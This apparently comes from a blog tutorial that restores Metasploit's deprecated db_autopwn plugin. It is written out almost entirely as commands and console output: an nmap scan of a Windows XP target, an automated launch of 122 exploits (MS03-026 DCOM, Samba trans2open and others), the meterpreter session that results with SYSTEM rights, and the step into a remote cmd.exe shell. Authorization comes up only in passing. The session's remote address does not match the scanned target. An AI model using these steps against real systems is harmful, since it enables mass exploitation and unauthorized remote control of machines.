db_autopwn was deprecated from Metasploit framework. In this tutorial we will get db_autopwn back to life. We need a Linux box with Metasploit installed. We are using Parrot Security OS with Metasploit 4.13. There are many arguments in favor and against db_autopwn but we are not going into that. I think for an authorized pen-test db_autopwn gives a quick overview, but opinions may differ.
To start we need to download db_autopwn.rb from here
and save the file. Copy this file to plugins directory of metasploit, for me it is
Now open the terminal and follow the flowing commands
$ sudo service postgresql start
$ sudo msfdb init # it has to be done only once
$ sudo msfconsole
After metasploit is loaded
msf > db_nmap -sS -O YOUR_TARGET_IP
[*] Nmap: Starting Nmap 7.30 ( https://nmap.org ) at 2016-12-02 04:57 EST
[*] Nmap: Nmap scan report for 192.168.137.24
[*] Nmap: Host is up (0.0013s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 2869/tcp open icslap
[*] Nmap: MAC Address: 00:0C:29:A2:FA:1E (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.19 seconds
msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf > db_autopwn -p -e -q
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it's current limitations/issues.
[-] Minimal support and development via neinwechter on GitHub metasploit fork.
[*] (1/122 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.137.24:135...
[*] (2/122 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.137.24:139...
[*] (3/122 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.137.24:139...
[*] (122/122 [1 sessions]): Waiting on 0 launched modules to finish execution...
After completing execution of all the launched exploits you can view the active sessions using
msf > sessions -l
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITYSYSTEM @ DEVIL-52F89F74B 192.168.137.181:37897 -> 192.168.137.123:38328 (192.168.137.123)
to get into an active session use
msf > sessions -i 1
[*] Starting interaction with 1...
it give us the meterpreter, type
execute -f cmd.exe -i -H
it will give the shell of the remote host.
meterpreter > shell
Process 1356 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
After we have the shell/access we can start post-exploitation phase.